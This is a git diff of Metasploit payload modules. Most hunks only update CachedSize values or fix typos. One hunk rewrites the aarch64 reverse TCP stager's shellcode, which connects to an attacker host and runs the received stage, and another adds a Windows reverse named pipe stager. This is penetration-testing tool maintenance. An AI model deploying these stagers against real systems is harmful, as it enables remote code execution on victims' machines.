diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
index d7241022d6..01618c62b5 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
 module MetasploitModule
- CachedSize = 1059224
+ CachedSize = 1059368
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
index 9dcfa4638b..65778b0f92 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
 module MetasploitModule
- CachedSize = 1059224
+ CachedSize = 1059368
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
index 6573c7cd50..ee78530672 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
 module MetasploitModule
- CachedSize = 1036772
+ CachedSize = 1037512
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
index bfb5b65889..05b53aa7ba 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
 module MetasploitModule
- CachedSize = 1036772
+ CachedSize = 1037512
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
index 4fb6aeb351..bc38d4a374 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
 module MetasploitModule
- CachedSize = 1036772
+ CachedSize = 1037512
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
index b92931cb30..92ad4f9c77 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
 module MetasploitModule
- CachedSize = 1036084
+ CachedSize = 1036808
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
index 4184fbfa70..27e5989778 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
 module MetasploitModule
- CachedSize = 1036084
+ CachedSize = 1036808
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
index 9c584d2c3c..66cdd82b24 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
 module MetasploitModule
- CachedSize = 1036084
+ CachedSize = 1036808
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
index d4b81c414d..7c3d17f612 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
 module MetasploitModule
- CachedSize = 789164
+ CachedSize = 789196
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
index a1529ea88a..2edd9d4421 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
 module MetasploitModule
- CachedSize = 789164
+ CachedSize = 789196
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
index eb12d092a3..fe8cbdd08a 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
 module MetasploitModule
- CachedSize = 789164
+ CachedSize = 789196
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
index b1d45984e3..94dbd28258 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
 module MetasploitModule
- CachedSize = 855864
+ CachedSize = 855928
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
index a57d7853f1..353b7ccf37 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
 module MetasploitModule
- CachedSize = 855864
+ CachedSize = 855928
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
index 7b941b6fc2..48c3abe40b 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
 module MetasploitModule
- CachedSize = 855864
+ CachedSize = 855928
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
index 8343c7a2db..c8ec4d34ba 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
 module MetasploitModule
- CachedSize = 725024
+ CachedSize = 729184
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
index b70a9dd9b0..3e9f8ab1d6 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
 module MetasploitModule
- CachedSize = 725024
+ CachedSize = 729184
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
index faf3b67665..e52a985f0c 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
 module MetasploitModule
- CachedSize = 725024
+ CachedSize = 729184
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
index 3337240fae..3d44d1abe8 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 772796
+ CachedSize = 772828
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
index 3443d7e158..8d2f70e310 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 772796
+ CachedSize = 772828
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
index f50af31339..55bdf50aa5 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772796 + CachedSize = 772828 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index e2e5f05cf4..d5adac9574 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893496 + CachedSize = 893560 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 2d3a76a76a..0e8fe66ace 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893496 + CachedSize = 893560 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index c5c8c806f1..abb089db49 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893496 + CachedSize = 893560 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb index 2c6e7eea3a..4ed9636e28 100644 
--- a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb @@ -22,7 +22,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP Inline', 'Description' => 'Listen for a connection and spawn a command shell. - This implmentation does not include ebcdic character translation, + This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.', 'Author' => 'Bigendian Smalls', diff --git a/modules/payloads/singles/nodejs/shell_bind_tcp.rb b/modules/payloads/singles/nodejs/shell_bind_tcp.rb index 2e1d32ee2f..9791edb88f 100644 --- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb @@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell' module MetasploitModule - CachedSize = 456 + CachedSize = 583 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb index bacd994122..dda23c29a5 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell' module MetasploitModule - CachedSize = 488 + CachedSize = 601 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index 02652008b6..aae3bf8947 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 516 + CachedSize = 629 include Msf::Payload::Single include Msf::Payload::NodeJS 
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index 22d2d4f103..4a08503586 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618300 + CachedSize = 618412 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb index ad23394040..6436a8b549 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618300 + CachedSize = 618412 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index f46fc103e9..a70eb46ee7 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618300 + CachedSize = 618412 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/r/shell_bind_tcp.rb b/modules/payloads/singles/r/shell_bind_tcp.rb index 532b2dbe8a..c8bda82d1e 100644 --- a/modules/payloads/singles/r/shell_bind_tcp.rb +++ b/modules/payloads/singles/r/shell_bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 516 + CachedSize = 125 include Msf::Payload::Single include Msf::Payload::R 
diff --git a/modules/payloads/singles/r/shell_reverse_tcp.rb b/modules/payloads/singles/r/shell_reverse_tcp.rb index 1d85c1b5ed..3f2137b330 100644 --- a/modules/payloads/singles/r/shell_reverse_tcp.rb +++ b/modules/payloads/singles/r/shell_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 516 + CachedSize = 150 include Msf::Payload::Single include Msf::Payload::R diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 990c2fcbd4..4aa49bfccd 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 171583 + CachedSize = 179267 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 6f4ff6b4a3..12cb6341e7 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 172627 + CachedSize = 180311 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 497c51c67e..539bfd288f 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 172627 + CachedSize = 180311 include Msf::Payload::TransportConfig include Msf::Payload::Windows 
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 1be8bad8e2..23d9de6df9 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 171583 + CachedSize = 179267 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index 9f5f06ae24..256f5b6225 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 171583 + CachedSize = 179267 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index e8876c1069..de8c4d1e0e 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -20,7 +20,7 @@ module MetasploitModule 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline', 'Description' => 'Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not - comming from the IP defined in AHOST. This way the port will appear + coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.', 'Author' => [ diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index fe5574659a..058078b353 100644 
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 194623 + CachedSize = 205379 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 22871e6313..0398f24b52 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 195667 + CachedSize = 206423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 84ce0fd385..5679a3a8be 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 195667 + CachedSize = 206423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index f976180dfe..bb151559da 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 194623 + CachedSize = 205379 include Msf::Payload::TransportConfig include Msf::Payload::Windows 
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index dbe4e38232..337ebe2c73 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 194623 + CachedSize = 205379 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index 3fda8961b3..eb6ad11d09 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -17,7 +17,7 @@ require 'msf/core/handler/reverse_tcp' ### module MetasploitModule - CachedSize = 260 + CachedSize = 212 include Msf::Payload::Stager @@ -33,8 +33,8 @@ module MetasploitModule { 'Offsets' => { - 'LPORT' => [ 186, 'n' ], - 'LHOST' => [ 188, 'ADDR' ], + 'LPORT' => [ 206, 'n' ], + 'LHOST' => [ 208, 'ADDR' ], }, 'Payload' => [ @@ -45,19 +45,20 @@ module MetasploitModule 0xd28018c8, # mov x8, #0xc6 // #198 0xd4000001, # svc #0x0 0xaa0003ec, # mov x12, x0 - 0x10000501, # adr x1, b8 + 0x100005a1, # adr x1, cc 0xd2800202, # mov x2, #0x10 // #16 0xd2801968, # mov x8, #0xcb // #203 0xd4000001, # svc #0x0 - 0x35000420, # cbnz w0, ac + 0x350004c0, # cbnz w0, c0 0xaa0c03e0, # mov x0, x12 0xd10043ff, # sub sp, sp, #0x10 0x910003e1, # mov x1, sp 0xd2800082, # mov x2, #0x4 // #4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 - 0x34000340, # cbz w0, ac - 0xf94003e2, # ldr x2, [sp] + 0xb100041f, # cmn x0, #0x1 + 0x540003c0, # b.eq c0 + 0xb94003e2, # ldr w2, [sp] 0xd34cfc42, # lsr x2, x2, #12 0x91000442, # add x2, x2, #0x1 0xd374cc42, # lsl x2, x2, #12 
@@ -69,7 +70,9 @@ module MetasploitModule 0xaa1f03e5, # mov x5, xzr 0xd2801bc8, # mov x8, #0xde // #222 0xd4000001, # svc #0x0 - 0xf94003e4, # ldr x4, [sp] + 0xb100041f, # cmn x0, #0x1 + 0x54000200, # b.eq c0 + 0xb94003e4, # ldr w4, [sp] 0xf90003e0, # str x0, [sp] 0xaa0003e3, # mov x3, x0 0xaa0c03e0, # mov x0, x12 @@ -77,11 +80,13 @@ module MetasploitModule 0xaa0403e2, # mov x2, x4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 + 0xb100041f, # cmn x0, #0x1 + 0x540000c0, # b.eq c0 0x8b000063, # add x3, x3, x0 0xeb000084, # subs x4, x4, x0 - 0x54ffff21, # b.ne 84 - 0xf94003fe, # ldr x30, [sp] - 0xd65f03c0, # ret + 0x54fffee1, # b.ne 90 + 0xf94003e0, # ldr x0, [sp] + 0xd63f0000, # blr x0 0xd2800000, # mov x0, #0x0 // #0 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0 diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index 7afd06288c..048eff527c 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1188 + CachedSize = 1338 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index 1c37e02e3a..ad9c422279 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1187 + CachedSize = 1337 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb index 38f7db54b4..89f2f2ae3b 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb 
@@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1361 + CachedSize = 1511 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb index 8e705c5c07..290e3b936f 100644 --- a/modules/payloads/stagers/php/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1362 + CachedSize = 1512 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index a532fbaee0..3298b70837 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp' module MetasploitModule - CachedSize = 966 + CachedSize = 1116 include Msf::Payload::Stager include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb index 6316652d79..0d2d5337ed 100644 --- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp' module MetasploitModule - CachedSize = 1140 + CachedSize = 1290 include Msf::Payload::Stager include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/stagers/windows/reverse_named_pipe.rb b/modules/payloads/stagers/windows/reverse_named_pipe.rb new file mode 100644 index 0000000000..ae3ef3d1b2 --- /dev/null +++ b/modules/payloads/stagers/windows/reverse_named_pipe.rb 
@@ -0,0 +1,31 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_named_pipe'
+require 'msf/core/payload/windows/reverse_named_pipe'
+
+module MetasploitModule
+
+ CachedSize = 276
+
+ include Msf::Payload::Stager
+ include Msf::Payload::Windows::ReverseNamedPipe
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Windows x86 Reverse Named Pipe (SMB) Stager',
+ 'Description' => 'Connect back to the attacker via a named pipe pivot',
+ 'Author' => ['OJ Reeves'],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'win',
+ 'Handler' => Msf::Handler::ReverseNamedPipe,
+ 'Arch' => ARCH_X86,
+ 'Convention' => 'handleedi',
+ 'Stager' => { 'RequiresMidstager' => false }
+ ))
+ end
+
+end
+
diff --git a/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb b/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb
new file mode 100644
index 0000000000..925ea4059b
--- /dev/null
+++ b/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb
